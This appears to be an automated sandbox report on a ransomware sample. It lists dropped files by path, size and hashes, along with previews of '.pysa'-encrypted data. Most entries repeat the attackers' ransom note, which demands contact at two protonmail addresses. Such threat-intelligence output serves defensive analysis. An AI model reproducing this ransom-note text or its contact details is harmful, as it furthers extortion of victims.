                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Virtualized\C\Users\user\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Virtualized\C\Users\user\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Virtualized\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetCookies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetHistory\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\RoamingState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\settings.dat.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.669577401684879
                  Encrypted:false
                  SSDEEP:192:+tPcYdruw6oD8v3qidqOdskkk3Oju9BJ+0K+hpmXxznvji2txXf1Yw:Qk8OoD8vNPdskRku9BJ+/+pmBLXx9Yw
                  MD5:7AC05043170143CB0D3CB41C8AFE036A
                  SHA1:BD185D75903682F01BD9373D89F1A570E9E50BC7
                  SHA-256:9E565588A811FDBA84BF6ECD3F5BBA6347EB3EF3F6715C313B8A3DD98B357DC4
                  SHA-512:71F6D99FEAEB4B029B4615EDB5FD92D73826BB1A6C1B1C02E4B9D67972633F2115B9E79CDDB9E572EF9CA292B3F44AC3FB2C837CDB3DD5464A437B3DB1679508
                  Malicious:false
                  Preview: ......+....#......?9}...(%.{.f..yH.&;%...S.jpd......a...jN*L..Fd.U..^].a..J5.`br....X.i...i...Mu.r.B\!....ER.9.VJR{.._..W.t.+.=...".2.]Fn^#8..7.\C..M...\....T?.?f.*.bJ..`ZAs.-..."?....a.z..V....M...........I......ss.....W.aL...WMRp.uoK.>.#./.."O..{C...!....|.5.Q..A.^.......V......X.Yd.h Z..G..\...V.y.....`G.8.....9/.9fVN..m...o.+i7?..4...A.`.._Q...t...w....>..k..N.."{............5..q...IM..`.%....x...9.4).z.:.B=..:.6q..........W...i.`.....c.....!*].u.....us..G..x8i.O..|J.........e'8..8....h.k..i......d..lS^.[..E9|......mei..L7.$ym7\:.~-....c..eU...$o...!.... .. ..3Q.?N...&...]}. ....g..u."s..B..&.\k.`.3...D/,...Pr..'c|`]B...b*.qOK..bo...D.],cME...L.)..pq\pYD.ji..v".E.....L..@@,5P..b...@...@7&)..vQ1.$z..l.7.rDY.~...-..R................z..uf....M;..*/_E......-{..@\.[Qt.....\...|...&%$L.8....d.{...R.x..F.7.GR..y.e5...66.J;.g.y}..>....b!.]'....bD...n...fCT)5.=.....j.....`. y.m.\....esl..o._._.T../.kl..Ygd..3..g.o.IF._om..-....'5f.QE.t.4...q.]@.
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\SystemAppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\TempState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):66560
                  Entropy (8bit):7.989807844868503
                  Encrypted:false
                  SSDEEP:1536:8m2gz+b4kkZft/yF40N66GeFY43KmV/v5kWG3BrknYNRmed:8Fc+b4kW66W39VH5LG3eYqed
                  MD5:B336C0E113AD980300BE22B3E638BC9E
                  SHA1:0FB3DD9BDE5DAD4B8117387F4753B61CD1B322F5
                  SHA-256:5050EB1D4B38DC0F7E46DE9A6981B6AC9099942DD232F2069C3D4ECB3751BE39
                  SHA-512:34218B9E810520AD922D05EC57C31ACCAC1708407581754B4D00F3C268E1E43FC98FFEBF6FE08834424AA47525B0A269E34510B613750E57E284B6F4D9141677
                  Malicious:false
                  Preview: ....{.M.w...<...:.AN....HN..M.l.+.....bxO.=CWs..IP.@.u~2.P^..^w..6..K.b...3*S..p|.......:....cz.Mm..~v..=F.=0#...,.w...p.EG...@....)..vM..:ux......OjJ....t...UQ...{...6T.o..(....Dm`..)....5.l.....;G\_..h}..6.(......_.O ...!...%.+..!^.....9..Y.Ko..hFj...M7..0....X.Phl..n........!.|\..".......-.y.H ?J..;..V.-..P..X.no..@X......k..aR.=..m....+..>.b..$..v...I.X}..'".&**.s....~."nL..e8.......M.?~mg?.O...")<\,;T....&.."..G.....b.RT..B.Z..nR...^....3...b..u.].`..+..).....^s..^..Q.7..........#..C..$........3..J...............&.....F..!].+.............W(.r`....i9..;S.~#O!:........3b`......n....Cl.X&m&.R. .I.....|.siF.W.f#...c[.MO..^.R....T....5!.2.}L..6.=...!.t.A.6.?.h.j,.K....D..=....7(.....R....,...4....C.Re.)\..*k..~....V..,......,A:.( ...k......7.....X.`.....B.b..a.?F.:.i..==HT....-U.S...b.v.%2..../ .($..h4.o.^f..?..<z....C...RZ....O.$.ci6.4..%...L..g....^L@.............t.....(s._...b.......%.S.....A.;...6.hJ...B.7..d...}j...*.b.K..,.W......NY
                  C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994547557894216
                  Encrypted:true
                  SSDEEP:3072:SjhaC3coiy7cnOHRSsAgCmayon6UFSzlEfD:00tnOGUayLUF9
                  MD5:CBC6551F2BEA52F138D7F2288390303B
